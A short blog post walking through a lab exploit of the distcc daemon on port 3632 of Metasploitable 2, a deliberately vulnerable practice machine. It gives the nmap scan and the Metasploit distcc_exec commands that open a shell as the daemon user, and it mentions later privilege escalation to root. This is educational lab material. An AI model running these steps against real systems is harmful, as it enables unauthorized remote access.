Wednesday, October 12, 2016

Pwning Metasploitable 2: Exploiting distcc v1 (GNU) 4.2.4

Lets look at port 3632.

Metasploitable 2 is running distcc

distcc is a program that is used to distribute compilation of code across machines on a network taking advantage of unused processing power of other computers. Machines on the network need to have distccd daemon and compatible compiler installed. 

Scanning port 3632

Enter the command: nmap -sV -p 3632 <<target IP address>>

Nmap scan shows that distccd v1 is running on port 3632.

Searching for exploit in msfconsole

Start up your msfconsole and search for a distcc exploit. 

Enter the command: search distcc

There is an exploit available for distcc. More references here and here.

Exploiting distcc using distcc_exec exploit

Lets use the exploit by giving the command: use exploit/unix/misc/distcc_exec

As usual, we need to give the exploit a target. 

Enter the command: set RHOST <<target IP address>>

...and exploit :)

Exploit was successful as a command shell session was opened.

However, unlike other time where we got "root" as our id, here we got daemon as the id. that means we compromised the target with daemon rights. 

A daemon is a program that runs a background process. It cant do nearly as much as a root. 

Good news is that we have privilege escalation. It bumps the privilege level to root by exploiting bugs in the code. We will use privilege escalation soon to bump our access level from daemon to root. 

-Jayesh Kerai (@secjay)

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.